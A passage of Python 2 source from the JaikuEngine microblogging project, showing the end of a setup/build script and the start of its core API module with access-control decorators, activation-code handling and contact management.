default_root)
d['SSL_LOGIN_ENABLED'] = get_input(HELP_SSL_LOGIN_ENABLED,
'Enable SSL login (yes|no)',
'yes',
yesno)
d['DEFAULT_FROM_EMAIL'] = get_input(HELP_DEFAULT_FROM_EMAIL,
'Enter an email address to send from')
o = []
for k, v in d.iteritems():
o.append('%s = %r\n' % (k, v))
if write_to_file:
print
print 'Writing your settings to local_settings.py...',
f = open('local_settings.py', 'w')
f.write('\n'.join(o))
f.close()
print ' done.'
else:
print
print 'Your settings:'
print
print '\n'.join(o)
def clean(skip_zip=False):
# TODO(termie): running this multiple times will tend to create zip files
# and then delete them
logging.info('Removing built files...')
# clean up docs, built html and zip files
if not skip_zip:
zipfiles = glob.glob(os.path.join(ROOT_DIR, '*.zip'))
else:
zipfiles = []
api_methods = glob.glob(os.path.join(DOC_DIR, 'method_*'))
api_decos = glob.glob(os.path.join(DOC_DIR, 'deco_*'))
html_docs = glob.glob(os.path.join(API_TEMPLATE_DIR, 'built_*'))
all_to_remove = zipfiles + api_methods + api_decos + html_docs
for filename in all_to_remove:
os.unlink(filename)
logging.info('Finished removing built files.')
# Helpers
def generate_secret_key():
bits = random.getrandbits(10)
return md5.new(str(time.time()) + str(bits)).hexdigest()
def required(s):
if not s:
raise ValueError('Invalid entry, cannot be empty')
return s
def yesno(s):
s = s.lower()
if s not in ('y', 'n', 'yes', 'no'):
raise ValueError('Invalid entry, please type yes or no')
return (False, True)[s.startswith('y')]
def get_input(message, prompt, default='', cleaner=required):
print message
real_prompt = '%s [%s]: ' % (prompt, default)
s = raw_input(real_prompt)
if not s and default:
s = default
try:
o = cleaner(s)
print '==============================='
except ValueError, e:
print
print 'Error:', e.message
o = get_input(message, prompt, default, cleaner)
return o
def rst_to_html(infile, outfile):
import docutils.core
docutils.core.publish_file(
source=infile,
destination=outfile,
writer_name='html',
settings_overrides={'default_template_path': RST_TEMPLATE_PATH,
'doctitle_xform': False}
)
def rst_docs(api_doc):
from epydoc import apidoc
sig_template = '**%(shortname)s** (%(args_list)s)'
dec_template = ' * %(decorator)s'
shortname = str(api_doc.canonical_name).split('.')[-1]
args_list = ', '.join(api_doc.posargs)
if api_doc.kwarg:
args_list += ', \*\*%s' % api_doc.kwarg
o = [sig_template % {'shortname': shortname, 'args_list': args_list},
'']
#for d in api_doc.decorators:
# o.append(dec_template % {'decorator': d})
o.append('')
if api_doc.docstring != apidoc.UNKNOWN:
o.append(api_doc.docstring)
else:
o.append('No additional documentation')
return '\n'.join(o)
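# Illustrative sketch, not part of the original script: for a public API method
# such as actor_get(api_user, nick), rst_docs() emits a reStructuredText
# signature line like
#   **actor_get** (api_user, nick)
# followed by the method's docstring, or 'No additional documentation' when the
# docstring is unknown.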
def _strip_contrib(dirnames):
for d in IGNORED_CONTRIB:
try:
dirnames.remove(d)
except ValueError:
pass
def zip_vendor_lib(lib):
f = zipfile.ZipFile('%s.zip' % lib, 'w')
for dirpath, dirnames, filenames in os.walk('vendor/%s' % lib):
if dirpath == os.path.join('vendor', lib, 'contrib'):
_strip_contrib(dirnames)
for filename in filenames:
name = os.path.join(dirpath, filename)
if ZIP_SKIP_RE.search(name):
logging.debug('Skipped (skip_re): %s', name)
continue
if not os.path.isfile(name):
logging.debug('Skipped (isfile): %s', name)
continue
logging.debug('Adding %s...', name)
f.write(name, name[len('vendor/'):], zipfile.ZIP_DEFLATED)
f.close()
if __name__ == "__main__":
command = ''
if len(sys.argv) > 1:
command = sys.argv[1]
if command.startswith('config'):
build_config(True)
```
#### File: jaikuengine/common/api.py
```python
import random
import re
import datetime
import logging
from cleanliness import cleaner
from django.conf import settings
from google.appengine.ext import db
from google.appengine.api import urlfetch
from google.appengine.api import images
from common.models import Stream, StreamEntry, InboxEntry, Actor, Relation
from common.models import Subscription, Invite, OAuthConsumer, OAuthRequestToken
from common.models import OAuthAccessToken, Image, Activation
from common.models import KeyValue, Presence
from common.models import AbuseReport
from common.models import Task
from common.models import PRIVACY_PRIVATE, PRIVACY_CONTACTS, PRIVACY_PUBLIC
from common import clean
from common import clock
from common import exception
from common import imageutil
from common import mail
from common import memcache
from common import models
from common import normalize
from common import patterns
from common import properties
from common import throttle
from common import util
from common import validate
from common.protocol import sms
from common.protocol import xmpp
NO_ACCESS = 'none'
READ_ACCESS = 'read'
WRITE_ACCESS = 'write'
DELETE_ACCESS = 'delete'
ADMIN_ACCESS = 'admin'
ACCESS_LEVELS = [NO_ACCESS,
READ_ACCESS,
WRITE_ACCESS,
DELETE_ACCESS,
ADMIN_ACCESS]
ROOT = Actor(nick=settings.ROOT_NICK, type='user')
ROOT.access_level = ADMIN_ACCESS
# Max length of a message. Conciseness is a virtue.
# UIs should prevent posting longer messages. API will truncate
# posts longer than this.
MAX_POST_LENGTH = 140
# How many contacts we are willing to count to update an actor's
# contact_count or follower_count properties
CONTACT_COUNT_THRESHOLD = 100
# Maximum number of channels a user is allowed to admin at a time
MAX_ADMINS_PER_ACTOR = 48
# The default length of a task's visibility lock in seconds
DEFAULT_TASK_EXPIRE = 10
# The maximum number of followers to process per task iteration of inboxes
MAX_FOLLOWERS_PER_INBOX = 100
# The maximum number of followers we can notify per task iteration
MAX_NOTIFICATIONS_PER_TASK = 100
# The first notification type to handle
FIRST_NOTIFICATION_TYPE = 'im'
AVATAR_IMAGE_SIZES = { 'u': (30, 30),
't': (50, 50),
'f': (60, 60),
'm': (175, 175),
}
# Wrap utcnow so that it can be mocked in tests. We can't replace the function
# in the datetime module because it's an extension, not a python module.
utcnow = lambda: clock.utcnow()
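# Illustrative note, not in the original source: because callers go through this
# module-level utcnow rather than datetime.datetime.utcnow directly, tests can
# freeze time with something along the lines of
#   api.utcnow = lambda: datetime.datetime(2009, 1, 1)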
RE_NS_DOMAIN = settings.NS_DOMAIN.replace('.', r'\.')
channel_post_re = re.compile(
r'^(?P<channel>#[a-zA-Z][a-zA-Z0-9]{%d,%d}(?:@%s)?)'
r':?\s+' # separator
r'(?P<message>.*)' # message
% (clean.NICK_MIN_LENGTH - 1, clean.NICK_MAX_LENGTH - 1, RE_NS_DOMAIN)
)
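# Illustration, not in the original source: a post body such as
#   '#news: hello world'
# matches channel_post_re with group('channel') == '#news' and
# group('message') == 'hello world', assuming '#news' satisfies the configured
# nick length bounds; an optional '@<NS_DOMAIN>' suffix on the channel is also
# accepted.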
smashed_title_re = re.compile(r'(?:(?:^|\s+)(\w))')
# little helper for code reuse
def _item_from_args_kw(f, allowed, args, kw):
""" attempt to fetch an identifying key from the list of args and kw,
allowed - list of allowable kw key names
args - list of args
kw - dict of key-value args
"""
x = None
for possible in allowed:
x = kw.get(possible)
if x:
break
if not x:
x = args[0]
return f(ROOT, x)
def _actor_from_args_kw(allowed, args, kw):
return _item_from_args_kw(actor_get, allowed, args, kw)
def _entry_from_args_kw(allowed, args, kw):
return _item_from_args_kw(entry_get, allowed, args, kw)
def _stream_from_args_kw(allowed, args, kw):
return _item_from_args_kw(stream_get, allowed, args, kw)
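# Illustrative note, not in the original source: the access-control decorators
# below use these helpers to locate the entity a call refers to. For a call
# like actor_get_contacts(api_user, nick=some_nick), the decorator invokes
# _actor_from_args_kw(['channel', 'nick', 'owner'], args, kw), which picks the
# first matching keyword argument (falling back to args[0]) and fetches that
# actor as ROOT before the permission check runs.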
# Better Access Control
def has_access(actor_ref, access_level):
if not actor_ref:
return False
# TODO(termie): I don't really like that the default access is full access
# but changing that in any way makes testing much more
# verbose, requiring us to set access levels every time we
# fetch an actor to use. Some work can probably be done to
# put the site into some testing mode where the default
# access level for testing is DELETE_ACCESS at which point
# this can become NO_ACCESS again
test_access = getattr(actor_ref, 'access_level', DELETE_ACCESS)
if ACCESS_LEVELS.index(access_level) <= ACCESS_LEVELS.index(test_access):
return True
return False
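# Illustrative sketch, not in the original source: access checks are ordinal
# comparisons over ACCESS_LEVELS, so a higher level implies every lower one:
#   staff_ref = Actor(nick='staff@%s' % settings.NS_DOMAIN, type='user')
#   staff_ref.access_level = WRITE_ACCESS
#   has_access(staff_ref, READ_ACCESS)   # True, write implies read
#   has_access(staff_ref, ADMIN_ACCESS)  # False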
def actor_owns_actor(actor_ref, other_ref):
if not actor_ref or not other_ref:
return False
# actors own themselves
if actor_ref.nick == other_ref.nick:
return True
# admins own anything
if has_access(actor_ref, ADMIN_ACCESS):
return True
# if this is a channel, it is owned by its admins
if (other_ref.is_channel()
and channel_has_admin(ROOT, other_ref.nick, actor_ref.nick)
):
return True
# well, we tried.
return False
def actor_owns_stream(actor_ref, stream_ref):
if not stream_ref:
return False
# streams are owned by whoever owns the actor that owns a stream
stream_owner_ref = actor_get_safe(ROOT, stream_ref.owner)
if not stream_owner_ref:
# this stream has no owner, the owner is deleted, something like that
# we shouldn't ever really be getting here
return False
return actor_owns_actor(actor_ref, stream_owner_ref)
def actor_owns_entry(actor_ref, entry_ref):
if not entry_ref:
return False
  # owned by whoever owns the actor who wrote the entry
entry_actor_ref = actor_get_safe(ROOT, entry_ref.actor)
if not entry_actor_ref:
# this entry has no author, the author is deleted, something like that
# we shouldn't ever really be getting here
return False
if actor_owns_actor(actor_ref, entry_actor_ref):
return True
  # owned by whoever owns the actor who owns the stream the entry is in
entry_owner_ref = actor_get_safe(ROOT, entry_ref.owner)
if not entry_owner_ref:
# this stream has no owner, the owner is deleted, something like that
# we shouldn't ever really be getting here
return False
if actor_owns_actor(actor_ref, entry_owner_ref):
return True
# if this is a comment we have to check for the entry as well
# this is recursive, but should be okay since we can't comment on comments
if entry_ref.entry:
entry_parent_ref = entry_get_safe(ROOT, entry_ref.entry)
if actor_owns_entry(actor_ref, entry_parent_ref):
return True
return False
def actor_can_view_actor(actor_ref, other_ref):
""" actor_ref can view other_ref """
if not other_ref:
return False
# if other is public
if other_ref.is_public():
return True
# if we're not public we better have an actor_ref
if not actor_ref:
return False
# if we are the owner
if actor_owns_actor(actor_ref, other_ref):
return True
# other_ref is restricted
if other_ref.is_restricted():
# and we are a contact
if (not other_ref.is_channel()
and actor_has_contact(ROOT, other_ref.nick, actor_ref.nick)
):
return True
# is a channel and we are a member (admin covered above by owner)
if (other_ref.is_channel()
and channel_has_member(ROOT, other_ref.nick, actor_ref.nick)
):
return True
return False
def actor_can_view_stream(actor_ref, stream_ref):
if not stream_ref:
return False
# if stream is public
if stream_ref.is_public():
return True
if actor_owns_stream(actor_ref, stream_ref):
return True
if stream_ref.is_restricted():
stream_owner_ref = actor_get_safe(ROOT, stream_ref.owner)
if actor_can_view_actor(actor_ref, stream_owner_ref):
return True
# special case the comments stream, because it is private but comments take
# on the privacy of the entries they are on
# this allows anybody to see that the comments stream exists while giving
# no specific access to any actual comments held therein
# unfortunately some of the imported data has type == 'comment' and some
# type == 'comments'.
if stream_ref.type == 'comment' or stream_ref.type == 'comments':
return True
return False
def actor_can_view_entry(actor_ref, entry_ref):
if not entry_ref:
return False
if actor_owns_entry(actor_ref, entry_ref):
return True
# if not a comment inherit the visibility of the stream
if not entry_ref.entry:
stream_ref = stream_get_safe(ROOT, entry_ref.stream)
if actor_can_view_stream(actor_ref, stream_ref):
return True
# if this is a comment we want to check the parent entry's stream
if entry_ref.entry:
entry_parent_ref = entry_get_safe(ROOT, entry_ref.entry)
if actor_can_view_entry(actor_ref, entry_parent_ref):
return True
return False
# Better Access Control Decorators
def access_required(access_level):
def _decorator(f):
def _wrap(api_user, *args, **kw):
if not has_access(api_user, access_level):
raise exception.ApiException(
exception.PERMISSION_ERROR,
'You need %s access or above to use this method' % access_level)
return f(api_user, *args, **kw)
_wrap.func_name = f.func_name
_wrap.meta = append_meta(f, '%s_required' % access_level)
return _wrap
return _decorator
write_required = access_required(WRITE_ACCESS)
delete_required = access_required(DELETE_ACCESS)
admin_required = access_required(ADMIN_ACCESS)
def append_meta(f, key, value=None):
if not hasattr(f, 'meta'):
f.meta = []
f.meta.append((key, value))
return f.meta
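# Illustrative note, not in the original source: stacked decorators accumulate
# entries on the wrapped function's meta list, so a method declared as
#   @write_required
#   @owner_required
#   def some_call(api_user, nick): ...
# ends up with meta == [('owner_required', None), ('write_required', None)].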
def owner_required(f):
def _wrap(api_user, *args, **kw):
actor_ref = _actor_from_args_kw(['nick', 'owner', 'channel'], args, kw)
if not actor_owns_actor(api_user, actor_ref):
# TODO(termie): pretty obtuse message...
raise exception.ApiException(exception.PRIVACY_ERROR,
'Operation not allowed')
# everything checks out, call the original function
return f(api_user, *args, **kw)
_wrap.func_name = f.func_name
_wrap.meta = append_meta(f, 'owner_required')
return _wrap
def owner_required_by_target(f):
def _wrap(api_user, *args, **kw):
# TODO(termie): I don't really like that this looks at the second
# arg, it feels hacky.
target = kw.get('target')
if target is None:
target = args[1]
nick = util.get_user_from_topic(target)
actor_ref = actor_get_safe(ROOT, nick)
if not actor_ref:
raise exception.ApiException(0x00, 'Actor does not exist: %s' % nick)
if not actor_owns_actor(api_user, actor_ref):
# TODO(termie): pretty obtuse message...
raise exception.ApiException(exception.PRIVACY_ERROR,
'Operation not allowed')
# everything checks out, call the original function
return f(api_user, *args, **kw)
_wrap.func_name = f.func_name
_wrap.meta = append_meta(f, 'owner_required_by_target')
return _wrap
def owner_required_by_entry(f):
def _wrap(api_user, *args, **kw):
entry_ref = _entry_from_args_kw(['entry', 'comment'], args, kw)
if not actor_owns_entry(api_user, entry_ref):
# TODO(termie): pretty obtuse message...
raise exception.ApiException(exception.PRIVACY_ERROR,
'Operation not allowed')
# everything checks out, call the original function
return f(api_user, *args, **kw)
_wrap.func_name = f.func_name
_wrap.meta = append_meta(f, 'owner_required_by_entry')
return _wrap
# TODO(termie): this could probably have a better name
def viewable_required(f):
""" assert that the calling user is allowed to view this """
def _wrap(api_user, *args, **kw):
if not has_access(api_user, ADMIN_ACCESS):
actor_ref = _actor_from_args_kw(['channel', 'nick', 'owner'], args, kw)
if not actor_can_view_actor(api_user, actor_ref):
# TODO(termie): pretty obtuse message...
raise exception.ApiException(exception.PRIVACY_ERROR,
'Operation not allowed')
# everything checks out, call the original function
return f(api_user, *args, **kw)
_wrap.func_name = f.func_name
_wrap.meta = append_meta(f, 'viewable_required')
return _wrap
def viewable_required_by_entry(f):
def _wrap(api_user, *args, **kw):
if not has_access(api_user, ADMIN_ACCESS):
entry_ref = _entry_from_args_kw(['entry', 'comment'], args, kw)
if not actor_can_view_entry(api_user, entry_ref):
# TODO(termie): pretty obtuse message...
raise exception.ApiException(exception.PRIVACY_ERROR,
'Operation not allowed')
# everything checks out, call the original function
return f(api_user, *args, **kw)
_wrap.func_name = f.func_name
_wrap.meta = append_meta(f, 'viewable_required_by_entry')
return _wrap
def viewable_required_by_stream(f):
def _wrap(api_user, *args, **kw):
if not has_access(api_user, ADMIN_ACCESS):
stream_ref = _stream_from_args_kw(['stream'], args, kw)
if not actor_can_view_stream(api_user, stream_ref):
# TODO(termie): pretty obtuse message...
raise exception.ApiException(exception.PRIVACY_ERROR,
'Operation not allowed')
# everything checks out, call the original function
return f(api_user, *args, **kw)
_wrap.func_name = f.func_name
_wrap.meta = append_meta(f, 'viewable_required_by_stream')
return _wrap
public_owner_or_contact = viewable_required
public_owner_or_member = viewable_required
public_owner_or_contact_by_entry = viewable_required_by_entry
public_owner_or_contact_by_stream = viewable_required_by_stream
# Throttling
def throttled(**decokw):
def _decorator(f):
def _wrap(api_user, *args, **kw):
throttle.throttle(api_user, f.func_name, **decokw)
return f(api_user, *args, **kw)
_wrap.func_name = f.func_name
_wrap.meta = append_meta(f, 'throttled', decokw)
return _wrap
return _decorator
def catch_image_error(f):
"""Decorator that catches app engine image errors and translates them to
ApiException"""
def _wrap(*args, **kw):
return exception.handle_image_error(f, *args, **kw)
_wrap.func_name = f.func_name
_wrap.meta = append_meta(f, 'handle_image_error')
return _wrap
# CALLS
#######
#######
#######
@admin_required
def abuse_get_entry(api_user, entry):
entry_ref = entry_get(api_user, entry)
key_name = AbuseReport.key_from(entry=entry_ref.keyname())
abuse_ref = AbuseReport.get_by_key_name(key_name)
return abuse_ref
@write_required
@owner_required # this is only over the reporter, not the entry
def abuse_report_entry(api_user, nick, entry):
""" a user report of an entry as spam
should probably do something interesting but for now we're just
going to keep track of it
"""
entry_ref = entry_get(api_user, entry)
reporter_ref = actor_get(api_user, nick)
# XXX begin transaction
abuse_ref = abuse_get_entry(ROOT, entry)
if abuse_ref:
abuse_ref.reports = list(set(abuse_ref.reports + [reporter_ref.nick]))
abuse_ref.count = len(abuse_ref.reports)
else:
params = {'entry': entry_ref.keyname(),
'actor': entry_ref.actor,
'count': 1,
'reports': [reporter_ref.nick],
}
abuse_ref = AbuseReport(**params)
abuse_ref.put()
# TODO(termie): if we cross some sort of threshold we should probably
# mark a user as an abuser and prevent them from posting
# XXX end transaction
return abuse_ref
#######
#######
#######
@owner_required
def activation_activate_email(api_user, nick, code):
activation_ref = activation_get_code(api_user, nick, 'email', code)
if not activation_ref:
raise exception.ApiException(0x00, 'Invalid code')
existing_ref = actor_lookup_email(ROOT, activation_ref.content)
if existing_ref:
raise exception.ApiException(
0x00, 'That email address has already been activated')
# XXX begin transaction
actor_ref = actor_get(api_user, nick)
relation_ref = email_associate(ROOT, actor_ref.nick, activation_ref.content)
activation_ref.delete()
# XXX end transaction
return relation_ref
@owner_required
def activation_activate_mobile(api_user, nick, code):
activation_ref = activation_get_code(api_user, nick, 'mobile', code)
if not activation_ref:
raise exception.ApiException(0x00, 'Invalid code')
existing_ref = actor_lookup_mobile(ROOT, activation_ref.content)
if existing_ref:
raise exception.ApiException(
0x00, 'That mobile number has already been activated')
# XXX begin transaction
actor_ref = actor_get(api_user, nick)
relation_ref = mobile_associate(ROOT, actor_ref.nick, activation_ref.content)
activation_ref.delete()
# XXX end transaction
return relation_ref
@admin_required
def activation_create(api_user, nick, type, content):
activation_ref = Activation(
actor=nick,
content=content,
code=util.generate_uuid()[:4],
type=type,
)
activation_ref.put()
return activation_ref
@admin_required
def activation_create_email(api_user, nick, email):
validate.email(email)
validate.email_not_activated(email)
return activation_create(api_user, nick, 'email', email)
@admin_required
def activation_create_mobile(api_user, nick, mobile):
clean.mobile(mobile)
if actor_lookup_mobile(api_user, mobile):
raise exception.ApiException(0x00, 'Mobile number already in use')
return activation_create(api_user, nick, 'mobile', mobile)
@admin_required
def activation_get(api_user, nick, type, content):
key_name = Activation.key_from(actor=nick, type=type, content=content)
return Activation.get_by_key_name(key_name)
@owner_required
def activation_get_actor_email(api_user, nick):
query = Activation.gql('WHERE type = :1 AND actor = :2',
'email',
nick)
activations = list(query.run())
return activations
def activation_get_by_email(api_user, email):
query = Activation.gql('WHERE type = :1 AND content = :2',
'email',
email)
activations = list(query.run())
return activations
@owner_required
def activation_get_actor_mobile(api_user, nick):
query = Activation.gql('WHERE type = :1 AND actor = :2',
'mobile',
nick)
activations = list(query.run())
return activations
@owner_required
def activation_get_code(api_user, nick, type, code):
query = Activation.gql('WHERE type = :1 AND actor = :2 AND code = :3',
type,
nick,
code)
activation_ref = query.get()
return activation_ref
@admin_required
def activation_get_email(api_user, nick, email):
return activation_get(api_user, nick, 'email', email)
@admin_required
def activation_get_mobile(api_user, nick, mobile):
return activation_get(api_user, nick, 'mobile', mobile)
@throttled(minute=2, hour=5, day=10)
@owner_required
def activation_request_email(api_user, nick, email):
nick = clean.nick(nick)
email = normalize.email(email)
validate.email(email)
actor_ref = actor_get(api_user, nick)
  # can't request an activation for an email that already exists
existing_ref = actor_lookup_email(ROOT, email)
if existing_ref:
raise exception.ApiException(0, "That email address is already in use")
# check whether they've already tried to activate this email
  # if they have, send them the same code
# TODO(tyler): Abstract into activation_get_or_create
activation_ref = activation_get_email(ROOT, nick, email)
if not activation_ref:
old_activations = activation_get_actor_email(ROOT, nick)
for old_activation_ref in old_activations:
old_activation_ref.delete()
activation_ref = activation_create_email(ROOT, nick, email)
subject, message, html_message = mail.email_confirmation_message(api_user,
activation_ref.code)
email_send(ROOT, email, subject, message, html_message=html_message)
return activation_ref
@throttled(minute=2, hour=5, day=10)
@owner_required
def activation_request_mobile(api_user, nick, mobile):
mobile = clean.mobile(mobile)
actor_ref = actor_get(api_user, nick)
  # can't request an activation for a mobile number that already exists
existing_ref = actor_lookup_mobile(ROOT, mobile)
if existing_ref:
raise exception.ApiException(0, "That mobile number is already in use")
  # check whether they've already tried to activate this mobile number;
  # if they have, send them the same code
# TODO(tyler): Abstract into activation_get_or_create
activation_ref = activation_get_mobile(ROOT, nick, mobile)
if not activation_ref:
old_activations = activation_get_actor_mobile(ROOT, nick)
for old_activation_ref in old_activations:
old_activation_ref.delete()
activation_ref = activation_create_mobile(ROOT, nick, mobile)
message = "Your activation code is %s" % activation_ref.code
sms_send(ROOT, api_user.nick, mobile, message)
return activation_ref
#######
#######
#######
@throttled(minute=50, hour=200, day=300, month=500)
@write_required
@owner_required
def actor_add_contact(api_user, owner, target):
"""Adds a one-way relationshp of type 'contact' from owner to target
May be called multiple times for the same owner and target and should
always ensure the same ending conditions.
PARAMS:
* owner - the nick of the follower
* target - the nick of the followed
RETURNS: rel_ref
EXAMPLE API RETURN:
::
{'status': 'ok',
'rv': {'relation': {'owner': '<EMAIL>',
'relation': 'contact',
'target': '<EMAIL>'
}
}
}
"""
owner = clean.nick(owner)
target = clean.nick(target)
owner_ref = actor_get(api_user, owner)
target_ref = actor_get(api_user, target)
if not owner_ref:
raise exception.ApiException(0, 'Actor does not exist: %s' % owner)
if not target_ref:
raise exception.ApiException(0, 'Actor does not exist: %s' % target)
existing_rel_ref = actor_has_contact(ROOT, owner, target)
# XXX start transaction
if not existing_rel_ref:
# Add the relationship
relation = 'contact'
rel_ref = Relation(owner=owner_ref.nick, relation=relation,
target=target_ref.nick,
)
rel_ref.put()
else:
rel_ref = existing_rel_ref
  # We're doing some fancy stuff here to keep the counts precise for people
  # with < CONTACT_COUNT_THRESHOLD contacts or followers; precision matters
  # less for those above that threshold if a datastore error occurred between
  # creating the relationship and updating the count
if existing_rel_ref:
if owner_ref.extra.get('contact_count', 0) < CONTACT_COUNT_THRESHOLD:
      # using ROOT because this is an admin only function and
      # the return value is not given to the calling user
contact_count = actor_count_contacts(ROOT, owner_ref.nick)
owner_ref.extra['contact_count'] = contact_count
    if target_ref.extra.get('follower_count', 0) < CONTACT_COUNT_THRESHOLD:
      # using ROOT because this is an admin only function and
      # the return value is not given to the calling user
follower_count = actor_count_followers(ROOT, target_ref.nick)
target_ref.extra['follower_count'] = follower_count
else:
# Increase the counts for each
owner_ref.extra.setdefault('contact_count', 0)
owner_ref.extra['contact_count'] += 1
owner_ref.put()
target_ref.extra.setdefault('follower_count', 0)
target_ref.extra['follower_count'] += 1
target_ref.put()
# Subscribe owner to all of target's streams
streams = stream_get_actor(ROOT, target)
for stream in streams:
sub = subscription_request(api_user,
topic=stream.key().name(),
target='inbox/%s/overview' % owner
)
owner_streams = stream_get_actor(api_user, owner)
for stream in owner_streams:
sub_ref = subscription_get(ROOT,
stream.key().name(),
'inbox/%s/overview' % (target)
)
if sub_ref and sub_ref.state == 'pending':
sub_ref.state = 'subscribed'
sub_ref.put()
# Add contact's recent posts to user's stream.
try:
# ROOT because this is an admin only operation for the moment.
inbox_copy_entries(ROOT, target, owner)
except:
# Private stream, couldn't add.
pass
# XXX end transaction
if not existing_rel_ref:
_notify_new_contact(owner_ref, target_ref)
return ResultWrapper(rel_ref, relation=rel_ref)
@write_required
@owner_required
def actor_add_contacts(api_user, owner, targets):
""" actor_add_contact for each of targets """
o = {}
  for target in targets:
    try:
      o[target] = actor_add_contact(api_user, owner, target)
    except exception.ApiException:
      o[target] = None
  return o
@admin_required
def actor_count_contacts(api_user, nick):
nick = clean.user(nick)
query = Relation.gql('WHERE owner = :1 AND relation = :2',
nick,
'contact')
return query.count()
@admin_required
def actor_count_followers(api_user, nick):
nick = clean.user(nick)
query = Relation.gql('WHERE target = :1 AND relation = :2',
nick,
'contact')
return query.count()
def actor_is_follower(api_user, nick, potential_follower):
"""Determine if one is a follower.
PARAMETERS:
potential_follower - stalker.
RETURNS: boolean
"""
nick = clean.user(nick)
potential_follower = clean.user(potential_follower)
key_name = Relation.key_from(relation='contact',
owner=potential_follower,
target=nick)
rel_ref = Relation.get_by_key_name(key_name)
return rel_ref and True
def actor_is_contact(api_user, nick, potential_contact):
"""Determine if one is a contact.
PARAMETERS:
potential_contact - stalkee.
RETURNS: boolean
"""
nick = clean.user(nick)
potential_contact = clean.user(potential_contact)
key_name = Relation.key_from(relation='contact',
owner=nick,
target=potential_contact)
rel_ref = Relation.get_by_key_name(key_name)
return rel_ref and True
def actor_get(api_user, nick):
"""Get an actor
PARAMS:
* nick - the nick of the actor
RETURNS: actor_ref
EXAMPLE API RETURN:
::
{'status': 'ok',
'rv': {'actor': {'nick': '<EMAIL>',
'privacy': 3,
'type': 'user',
'extra': {'icon': '/images/avatar_23132412',
'given_name': 'Test',
'family_name': 'User'
}
}
}
}
"""
nick = clean.nick(nick)
if not nick:
raise exception.ApiException(0x00, "Invalid nick")
not_found_message = 'Actor not found: %s' % nick
key_name = Actor.key_from(nick=nick)
actor_ref = Actor.get_by_key_name(key_name)
if not actor_ref:
raise exception.ApiNotFound(not_found_message)
if actor_ref.is_deleted():
raise exception.ApiDeleted(not_found_message)
if actor_can_view_actor(api_user, actor_ref):
return ResultWrapper(actor_ref, actor=actor_ref)
# TODO(termie): do we care about permissions here?
# the receiver of this instance can make modifications
# but this is currently necessary to update the
# follower / contact counts
return ResultWrapper(actor_ref, actor=actor_ref.to_api_limited())
# depends on actor_get privacy
def actor_get_actors(api_user, nicks):
o = {}
nicks = list(set(nicks))
if not nicks:
return o
for nick in nicks:
try:
actor = actor_get(api_user, nick)
except exception.ApiException:
actor = None
except exception.ValidationError:
logging.warn('Validation error for nick: %s' % nick)
actor = None
o[nick] = actor
return o
@public_owner_or_contact
def actor_get_channels_admin(api_user, nick, limit=48, offset=None):
"""returns the channels the given actor is a member of"""
nick = clean.nick(nick)
query = Relation.gql('WHERE target = :1 AND relation = :2 AND owner > :3',
nick,
'channeladmin',
offset)
rv = query.fetch(limit)
return [x.owner for x in rv]
@public_owner_or_contact
def actor_get_channels_member(api_user, nick, limit=48, offset=None):
"""returns the channels the given actor is a member of"""
query = Relation.gql('WHERE target = :1 AND relation = :2 AND owner > :3',
nick,
'channelmember',
offset)
rv = query.fetch(limit)
return [x.owner for x in rv]
@public_owner_or_contact
def actor_get_contacts(api_user, nick, limit=48, offset=None):
"""returns the contacts for the given actor if current_actor can view them"""
query = Relation.gql('WHERE owner = :1 AND relation = :2 AND target > :3',
nick,
'contact',
offset)
results = query.fetch(limit)
return [x.target for x in results]
@owner_required
def actor_get_contacts_since(api_user, nick, limit=30, since_time=None):
"""returns the contacts for the given actor if current_actor can view them"""
  # NOTE: since_time is not currently applied to this query; results match
  # actor_get_contacts
  query = Relation.gql('WHERE owner = :1 AND relation = :2 AND target > :3',
                       nick,
                       'contact',
                       None)
results = query.fetch(limit)
return [x.target for x in results]
@owner_required
def actor_get_contacts_avatars_since(api_user, nick, limit=30, since_time=None):
"""returns the avatars of contacts for the given actor"""
limit = int(limit)
contacts = actor_get_contacts(api_user, nick, limit)
contacts.append(nick)
contacts_ref = actor_get_actors(api_user, contacts)
results = []
if since_time is not None:
since_time = clean.datetime(since_time)
for contact_ref in contacts_ref.values():
if contact_ref:
if not since_time or contact_ref.avatar_updated_at > since_time:
results.append(contact_ref)
return ResultWrapper(results, contacts=results)
@public_owner_or_contact
def actor_get_followers(api_user, nick, limit=48, offset=None):
"""returns the followers for the given actor if current_actor can view them"""
query = Relation.gql('WHERE target = :1 AND relation = :2 AND owner > :3',
nick,
'contact',
offset)
results = query.fetch(limit)
return [x.owner for x in results]
def actor_get_safe(api_user, nick):
try:
return actor_get(api_user, nick)
except exception.ApiException:
return None
@public_owner_or_contact
def actor_has_contact(api_user, owner, target):
key_name = Relation.key_from(relation='contact', owner=owner, target=target)
return Relation.get_by_key_name(key_name)
def actor_lookup_email(api_user, email):
""" Lookup an actor based on an email address,
useful for determining if an email address is available
PARAMETERS:
email - email alias
RETURNS: actor_ref
"""
query = Relation.gql("WHERE target = :1 AND relation = 'email'",
email)
for rel_ref in query:
actor_ref = actor_get_safe(api_user, rel_ref.owner)
if actor_ref:
return actor_ref
return None
def actor_lookup_im(api_user, im):
query = Relation.gql('WHERE relation = :1 AND target = :2',
'im_account',
im)
rel_ref = query.get()
if not rel_ref:
return None
else:
return actor_get(api_user, rel_ref.owner)
def actor_lookup_mobile(api_user, mobile):
mobile = clean.mobile(mobile)
query = Relation.gql("WHERE target = :1 AND relation = 'mobile'",
mobile)
for rel_ref in query:
actor_ref = actor_get_safe(api_user, rel_ref.owner)
if actor_ref:
return actor_ref
return None
def actor_lookup_nick(api_user, nick):
""" lookup actor based on normalized version of the nick """
actor_ref = actor_get_safe(api_user, nick)
if actor_ref:
return actor_ref
nick = clean.normalize_nick(clean.nick(nick))
query = Actor.gql('WHERE normalized_nick = :1',
nick)
actor_ref = query.get()
if not actor_ref:
return None
return actor_get_safe(api_user, actor_ref.nick)
@delete_required
@owner_required
def actor_remove(api_user, nick):
"""Mark the specified actor for deletion."""
actor_ref = actor_get(api_user, nick)
if actor_ref:
actor_ref.mark_as_deleted()
return True
return False
@delete_required
@owner_required
def actor_remove_contact(api_user, owner, target):
owner_ref = actor_get(api_user, owner)
target_ref = actor_get(api_user, target)
# XXX start transaction
# Delete the relationship
key_name = Relation.key_from(relation='contact',
owner=owner_ref.nick,
target=target_ref.nick)
rel = Relation.get_by_key_name(key_name)
if not rel:
raise exception.ApiException(
0, 'Cannot remove a relationship that does not exist')
rel.delete()
# Decrease the counts for each
owner_ref.extra.setdefault('contact_count', 1)
owner_ref.extra['contact_count'] -= 1
owner_ref.put()
target_ref.extra.setdefault('follower_count', 1)
